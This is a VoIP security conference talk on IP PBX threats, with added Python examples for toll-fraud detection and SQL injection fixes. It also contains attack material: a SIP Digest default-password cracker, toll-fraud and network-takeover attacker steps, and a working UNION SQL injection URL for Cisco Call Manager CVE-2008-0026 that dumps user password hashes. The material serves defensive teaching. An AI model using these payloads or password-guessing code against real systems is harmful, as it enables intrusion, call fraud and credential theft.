Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income! Or Vice Versa?

DESCRIPTION

Integrated services from telecom operators and Unified Communications technology promise a quick payback and great convenience. In practice, however, VoIP and IP PBX services turn out to cause many problems, first of all in information security and fraud. What information security issues can arise for a company that uses Unified Communications? VoIP/PBX/MGW broken in 60 seconds: is it possible? Effective methods and the practicalities of securing Unified Communications are discussed.

VoIP security legends and myths

Konstantin Gurzov

Head of Sales Support Department

VoIP is attractive!

[Diagram: VoIP at the centre, surrounded by what an attacker can gain from it]
• Access to the company's network
• Control over calls (fraud)
• Data corruption and substitution
• Call interception
• Personal data theft
• and so on…

VoIP infrastructure components

[Diagram: transport (PSTN, IP networks, Internet, local network branches); application servers; management; back-end devices; boundary devices; an attacker's computer attached through the guest Wi-Fi network]

The VoIP segment is an integration of a number of specialised platforms and network devices, different networks and technologies.

All local-network threats apply to VoIP:
• Default passwords
• Management web interfaces
• Software vulnerabilities
• Traffic interception
• Account lockout

Known threats – well-known protection measures

Default passwords

[Chart: example metrics calculated from real-world data gathered by Positive Technologies specialists during internal information security audits, 2009]

About 50% of all network devices have default or easily brute-forced passwords.

• Back-end devices: the default PIN of a Cisco IP Phone is «**#*»
• SIP gateways: the default Asterisk password «admin» leads to denial of service, interception, integrity violation and toll fraud

Examples: reconfiguration, call monitoring, interception.

Management web interfaces: SQL injection, cross-site scripting, DoS and so on.

If an attacker manages to reach your device's management web interface, the attack is guaranteed to succeed.

Cisco Call Manager:
• CVE-2010-3039 – privilege escalation
• CVE-2007-4633 – XSS
• CVE-2007-4634 – SQL injection
• CVE-2008-0026 – SQL injection

Asterisk GUI:
• CVE-2008-1390 – CVSS base score 9.3

Examples

[Chart: probability of detecting vulnerabilities of each risk level, based on the analysis of 5,560 sites by Positive Technologies experts, 2009]

Software vulnerabilities

Arbitrary code execution over the network in Cisco Call Manager 6: the vulnerability allows attackers to execute arbitrary code.

Denial of service in Cisco Call Manager 6: the vulnerability allows attackers to cause a denial of service.

Services become unavailable or restricted:
• web interfaces with vulnerabilities
• weak password policy

Traffic listening

Any VoIP device is a member of an Ethernet network, so it is exposed to most network attacks:
• weakly protected wireless networks
• man-in-the-middle attacks
• tens of specialised applications for listening to VoIP traffic, for example Cain & Abel (www.oxid.it) and UCSniff (http://ucsniff.sourceforge.net)

Traffic listening leads to a loss of confidentiality and theft of personal data.
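The two findings above, default passwords and sniffable traffic, combine: a single captured REGISTER carrying its Digest Authorization header is enough to confirm a default or weak SIP password offline, without ever talking to the PBX. The script below is an added example, not code from the talk or from any tool named on the slides; the captured message, the realm «asterisk», the nonce and the wordlist are all constructed for the demonstration, and the captured response is generated the way the phone itself would have generated it from its provisioned password.

```python
"""Offline check of a captured SIP Digest exchange against default passwords.

Added example, not code from the talk.  The captured message, realm, nonce
and wordlist are constructed; the Digest computation is RFC 2617 (MD5, with
or without qop=auth), which is what SIP phones and PBXs implement.
"""
import hashlib
import re


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 2617 Digest response exactly as a SIP endpoint computes it."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    if qop:
        return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def parse_digest(msg):
    """Return (request method, Digest parameters) from a captured SIP request."""
    method = msg.split(" ", 1)[0]
    m = re.search(r"^Authorization:\s*Digest\s+(.*)$", msg, re.M)
    if not m:
        raise ValueError("no Digest Authorization header")
    params = {}
    # quoted values (realm="asterisk") and bare ones (algorithm=MD5)
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', m.group(1)):
        params[key] = quoted if quoted else bare
    return method, params


def check_default_passwords(msg, wordlist):
    """Return the password from wordlist that reproduces the sniffed
    response, or None if none of them does."""
    method, p = parse_digest(msg)
    for pw in wordlist:
        calc = digest_response(p["username"], p["realm"], pw, method, p["uri"],
                               p["nonce"], p.get("qop"), p.get("nc"), p.get("cnonce"))
        if calc == p["response"].lower():
            return pw
    return None


# Constructed capture: the phone's second REGISTER, answering the PBX's 401.
# In the demo the response is generated as the phone would have generated it
# from the weak password it was provisioned with; in a real capture this
# string is simply what was on the wire.
PROVISIONED_PASSWORD = "1234"
CAPTURED_REGISTER = (
    "REGISTER sip:pbx.example.test SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 10.0.5.23:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:1001@pbx.example.test>;tag=1928301774\r\n"
    "To: <sip:1001@pbx.example.test>\r\n"
    "Call-ID: a84b4c76e66710@10.0.5.23\r\n"
    "CSeq: 2 REGISTER\r\n"
    'Authorization: Digest username="1001", realm="asterisk", nonce="5f1c2a9b", '
    'uri="sip:pbx.example.test", response="%s", algorithm=MD5\r\n'
    "Content-Length: 0\r\n\r\n"
    % digest_response("1001", "asterisk", PROVISIONED_PASSWORD,
                      "REGISTER", "sip:pbx.example.test", "5f1c2a9b")
)

# Constructed wordlist of vendor defaults and extension-number passwords
DEFAULT_PASSWORDS = ["admin", "password", "cisco", "asterisk", "1001", "1234", "0000"]

if __name__ == "__main__":
    print("recovered password:", check_default_passwords(CAPTURED_REGISTER, DEFAULT_PASSWORDS))
```

The check is purely offline because Digest only protects the password from casual reading, not from a guessing attack on a captured exchange; the only real defences are passwords that are not in any such list and signalling that is not readable in the first place (TLS for SIP).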

Examples of real attacks

1. Traffic fraud
2. Interception of calls
3. Takeover of the corporate network

Traffic fraud

[Diagram: VoIP provider «А» is connected to the PSTN; the client company's IP PBX 1 is connected to provider «А» over a SIP trunk (H.323, SIP); the attacker's computer and IP PBX 2 are attached through the client's guest Wi-Fi network]

IP PBX 1 – the client's IP PBX, served by provider «А»
IP PBX 2 – the attacker's IP PBX

Preconditions:
1. No ACLs on devices
2. Weak device and software password policy
3. Low protection level of the VoIP infrastructure as a whole
4. Billing once a month

Traffic fraud – attacker's actions

1. Scan the network and find IP PBX 1.
2. Obtain a PSTN connection for IP PBX 2 through IP PBX 1.
3. Route expensive long-distance/international (MG/MH) calls through provider «А» into the PSTN.

Operator «А» is unable to clearly separate its responsibility from its client's, so it always ends up paying.

Traffic fraud – can be avoided if the operator:
• configures ACLs on the external interfaces of the client's IP PBX;
• ensures that calls arriving over the SIP trunk are not routed back out;
• blocks long-distance/international (MG/MH) calls if they are not used;
• extends the password policy to VoIP services;
• offers security assessment services for the client's hardware.
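The scenario works because precondition 4 (billing once a month) gives the attacker weeks before anyone looks at the traffic. The script below is an added example, not from the talk: it applies the operator's routing rules from the list above as detection rules over a day's call detail records, so that trunk loop-backs and international bursts are seen the same day. The CSV layout follows Asterisk-style CDRs, and the trunk channel name, dialling prefixes, business hours, threshold and all records are constructed assumptions.

```python
"""Daily toll-fraud screening of IP PBX call detail records.

Added example, not code from the talk.  Record format, trunk name, prefixes
and thresholds are assumptions modelled on Asterisk-style CSV CDRs.
"""
import csv
import io
import re
from collections import defaultdict
from datetime import datetime

TRUNK = "SIP/trunkA"        # assumed channel-name prefix of the SIP trunk to operator «А»
INTL_DST = re.compile(r"^(\+|00|810)\d{7,}$")  # assumed long-distance/international prefixes
MAX_INTL_PER_HOUR = 3       # assumed per-source threshold for a burst
BUSINESS_HOURS = range(8, 20)

# Constructed one-day CDR: normal internal/domestic traffic, two calls that
# entered over the trunk and left over it again at night, and a burst of
# international calls from one extension.
SAMPLE_CDR = """\
src,dst,channel,dstchannel,start,billsec,disposition
1001,1002,SIP/1001-00000001,SIP/1002-00000002,2011-05-19 10:02:11,61,ANSWERED
74951234567,1001,SIP/trunkA-00000003,SIP/1001-00000004,2011-05-19 11:15:40,300,ANSWERED
1002,74957654321,SIP/1002-00000005,SIP/trunkA-00000006,2011-05-19 14:30:05,120,ANSWERED
74950000000,8101234567890,SIP/trunkA-00000007,SIP/trunkA-00000008,2011-05-19 02:15:00,900,ANSWERED
74950000000,8101234567891,SIP/trunkA-00000009,SIP/trunkA-0000000a,2011-05-19 02:31:00,880,ANSWERED
1003,00441234567890,SIP/1003-0000000b,SIP/trunkA-0000000c,2011-05-19 15:05:00,45,ANSWERED
1003,00491234567890,SIP/1003-0000000d,SIP/trunkA-0000000e,2011-05-19 15:12:00,50,ANSWERED
1003,00331234567890,SIP/1003-0000000f,SIP/trunkA-00000010,2011-05-19 15:20:00,40,ANSWERED
1003,00341234567890,SIP/1003-00000011,SIP/trunkA-00000012,2011-05-19 15:41:00,70,ANSWERED
"""


def parse_cdr(text):
    return list(csv.DictReader(io.StringIO(text)))


def is_international(dst):
    return bool(INTL_DST.match(dst))


def _alert(rule, src, dst, start):
    return {"rule": rule, "src": src, "dst": dst, "start": start}


def screen_cdr(text):
    """Return a list of alerts for one CDR file."""
    alerts = []
    intl_by_src_hour = defaultdict(int)
    for r in parse_cdr(text):
        start = datetime.strptime(r["start"], "%Y-%m-%d %H:%M:%S")
        # Rule 1: a call that came in over the SIP trunk must never leave over it
        if r["channel"].startswith(TRUNK) and r["dstchannel"].startswith(TRUNK):
            alerts.append(_alert("trunk-loopback", r["src"], r["dst"], r["start"]))
        if is_international(r["dst"]):
            # Rule 2: long-distance/international calls outside business hours
            if start.hour not in BUSINESS_HOURS:
                alerts.append(_alert("intl-after-hours", r["src"], r["dst"], r["start"]))
            intl_by_src_hour[(r["src"], start.strftime("%Y-%m-%d %H:00"))] += 1
    # Rule 3: a burst of international calls from one source within an hour
    for (src, hour), n in sorted(intl_by_src_hour.items()):
        if n > MAX_INTL_PER_HOUR:
            alerts.append(_alert("intl-burst", src, f"{n} international calls", hour))
    return alerts


if __name__ == "__main__":
    for a in screen_cdr(SAMPLE_CDR):
        print(f'{a["rule"]:18} src={a["src"]:12} dst={a["dst"]} at {a["start"]}')
```

Rule 1 is the detective twin of the preventive rule "calls from the SIP trunk are not routed back": if the dialplan is correct the rule never fires, and a hit means the PBX configuration has drifted. The prefix list and the threshold have to be tuned to the customer's real calling pattern before the alerts are actionable.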

Interception of calls

[Diagram: company «А» IP PBX connected to the PSTN, the phones of the company's top managers (TOP) inside the office, and the attacker's computer outside the office, attached over a WEP-protected wireless network]

Preconditions:
1. Wireless networks are used
2. Weak encryption algorithms
3. ACLs are not used
4. Weak password policy

Takeover of the corporate network

[Diagram: as above – company «А» IP PBX, the PSTN, the top managers' (TOP) phones, the corporate LAN and the attacker's computer outside the office on a WEP wireless network; the attack path goes through SQL injection CVE-2008-0026]

Preconditions: the four listed for interception above, plus
5. No change management

Takeover of the corporate network – attacker's actions

1. Get access to the corporate network via Wi-Fi.
2. Find the Cisco Call Manager by its typical response, then:
   a) exploit the SQL injection CVE-2008-0026;
   b) obtain the user password hashes returned by the query;
   c) recover the passwords from the hashes.
3. One of the recovered passwords is the administrator password for all of the company's Cisco devices on the local network.

Query executed through the injection:
runsql select user,password from applicationuser

Injected request:
https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+SELECT+'','','',user,'',password+from+applicationuser;--

Through the VoIP services an attacker can take over the whole local network.
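To make the mechanics of the request above visible end to end, the following added example (not Cisco's code and not part of the talk) replays the slide's UNION payload against a throw-away SQLite schema and shows the parameterised query that defeats it. The table names follow the slide's query; the six-column layout of the address-book SELECT (chosen so that the slide's payload lines up), the column names, the user names and the hash values are constructed.

```python
"""The slide's address-book SQL injection reproduced against a throw-away
SQLite schema, next to the parameterised query that defeats it.

Added example, not Cisco's code.  Schema columns and all rows are constructed.
"""
import sqlite3
from urllib.parse import unquote_plus

# The slide's payload exactly as it travelled in the 'key' parameter, URL-decoded
SLIDE_PAYLOAD = unquote_plus(
    "'+UNION+ALL+SELECT+'','','',user,'',password+from+applicationuser;--")

# Assumed shape of the address-book lookup: six columns, key compared as a string
BASE_SELECT = ("SELECT pkid, fname, lname, email, phone, notes "
               "FROM personaladdressbook WHERE pkid = ")


def make_db():
    """In-memory stand-in for the PBX database (constructed schema and data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE personaladdressbook(pkid TEXT, fname TEXT, lname TEXT,
                                         email TEXT, phone TEXT, notes TEXT);
        CREATE TABLE applicationuser(user TEXT, password TEXT);
        INSERT INTO personaladdressbook VALUES
            ('1', 'Ann', 'Lee', 'ann@example.test', '1001', '');
        INSERT INTO applicationuser VALUES
            ('CCMAdministrator', 'constructed-hash-0001'),
            ('axlsysuser',       'constructed-hash-0002');
    """)
    return db


def lookup_vulnerable(db, key):
    """String concatenation: the parameter becomes part of the SQL grammar,
    so the quote in the payload closes the literal and the UNION appends a
    second SELECT over applicationuser; ';--' comments out the rest."""
    return db.execute(BASE_SELECT + "'" + key + "'").fetchall()


def lookup_fixed(db, key):
    """Bound parameter: the value is passed to the engine separately from the
    statement and can never alter its structure."""
    return db.execute(BASE_SELECT + "?", (key,)).fetchall()


def leaked_credentials(rows):
    """The payload puts user in column 4 and password in column 6 of the
    address-book result, which is where the slide's query placed them."""
    return sorted((r[3], r[5]) for r in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", leaked_credentials(lookup_vulnerable(db, SLIDE_PAYLOAD)))
    print("fixed:     ", lookup_fixed(db, SLIDE_PAYLOAD))
```

The fixed lookup returns nothing for the payload because it searches for an address-book key literally equal to the whole injected string; the same function still finds the real row for key "1". Pairing the parameterised query with a type check on the key (an integer or a fixed-format identifier) removes the remaining attack surface in that parameter.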

Conclusions

1. VoIP infrastructure is vulnerable to the same security threats as an ordinary corporate network.
2. VoIP service vulnerabilities are LAN vulnerabilities.
3. The same methods that build a protected LAN build a protected VoIP infrastructure.

Advice for building a secure infrastructure

Advice 1: monitor changes and updates in your VoIP infrastructure.

Advice 2: extend the password policy to VoIP services; use strong cryptographic algorithms.

Advice 3: use a compliance and vulnerability management system to prevent incidents.

Advice 4: offer security monitoring of clients' hardware as a value-added service (VAS).

Advice 5: take a broad view of your infrastructure's security; remember that it is not only workstations and the e-mail system.

Thank you for your attention!

Questions?

Konstantin Gurzov

kgurzov@ptsecurity.ru
